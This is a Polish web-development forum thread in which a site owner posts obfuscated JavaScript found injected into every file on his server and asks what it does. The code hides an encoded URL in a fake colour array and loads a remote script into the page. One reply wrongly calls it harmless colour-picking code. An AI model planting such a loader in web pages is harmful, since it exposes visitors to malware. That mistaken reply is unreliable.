Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: Trojan zaatakował pliki na serwerze
Forum PHP.pl > Forum > Po stronie przeglądarki > JavaScript
ookris
28.03.2011, 15:34:43
Witam.
Dzisiaj po uruchomieniu jednej z moich stron Avast zakomunikował mi iż zablokował połączenie z stroną www z powodu wykrycia trojana.
Po otwarciu zainfekowanych plików (*.js, *.html, *.php) znalazłem tam taki oto kod:

Kod
if (typeof(redef_colors)=="undefined") {

   var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e4745', '#3d4444', '#3d4043', '#3f3d41', '#3f423e', '#79823e', '#798084', '#748188', '#3d7c78', '#7d3d7f', '#777f31', '#4d0000');
   var redef_colors = 1;
   var colors_picked = 0;

   function div_pick_colors(t,styled) {
    var s = "";
    for (j=0;j<t.length;j++) {    
        var c_rgb = t[j];
        for (i=1;i<7;i++) {
            var c_clr = c_rgb.substr(i++,2);
            if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15);
        }
    }
    if (styled) {
        s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2));
    } else {
        s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime();
    }
    return s;
   }

   function try_pick_colors() {
    try {
           if(!document.getElementById || !document.createElement){
            document.write(div_pick_colors(div_colors,1));
           } else {
            var new_cstyle=document.createElement("script");
            new_cstyle.type="text/javascript";
            new_cstyle.src=div_pick_colors(div_colors,0);
            document.getElementsByTagName("head")[0].appendChild(new_cstyle);
        }
    } catch(e) { }
    try {
        check_colors_picked();
    } catch(e) {
        setTimeout("try_pick_colors()", 500);
    }
   }

   try_pick_colors();

}

jak ustrzec się przed tego typu atakami oraz co robi ten kod?
nekomata
29.03.2011, 13:59:30
Ciekawe jak ktoś ci tego trojana wrzucil na serwer , ogólnie avast to taki antywirus co znajduję wirusy tam gdzie ich niema , a tam gdzie są to ich nie widzi , ja bym obstawiał że samemu coś ściągałeś wcześniej i wklejałeś do swoich plików ,"kopiuj&wklej" a teraz myślisz że to wirus. A skrypt wygląda tak Zapisuję funkcję która losuje kolory , potem jeśli nie istnieje div to go tworzy i nadaję mu kolor wcześniej wylosowany.
Hekko
29.03.2011, 14:12:58
1. Masz trojana w komputerze, który wykradł hasło z FTP.
2. Dziurawy skrypt.
3. Dziura na serwerze.

Jedyne 3 opcje. Sprawdź je.
ookris
29.03.2011, 18:07:42
to raczej nie ja bo wszystkie strony na serwerze nie działają i każdy plik zawiera ten kod. Już napisałem do administratora serwera z prośbą o przywrócenie kopi plików.
Hekko
29.03.2011, 20:57:11
Jeśli wszystkie strony na Twoim koncie nie działają, to jest to patrz wyżej. Sprecyzuj co oznacza "wszystkie". Co to za serwer?
wszerad
1.04.2011, 15:02:43
Podobno miał miejsce gigantyczny atak SQL injection na serwery wykorzystujące bazy danych MS. Atak jest nie groźny bo zachęca tylko do pobrania niebezpiecznego antywirusa. Podobno 1.5mln stron oberwało, według Google
amii
1.04.2011, 17:57:42
Cytat(nekomata @ 29.03.2011, 14:59:30 ) *
A skrypt wygląda tak Zapisuję funkcję która losuje kolory , potem jeśli nie istnieje div to go tworzy i nadaję mu kolor wcześniej wylosowany.


Ten skrypt nie losuje kolorów a dla ciekawych co losuje mogą sobie zobaczyć tu podklejając kod -> http://www.w3schools.com/jsref/tryit.asp?f...ef_fromcharcode
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.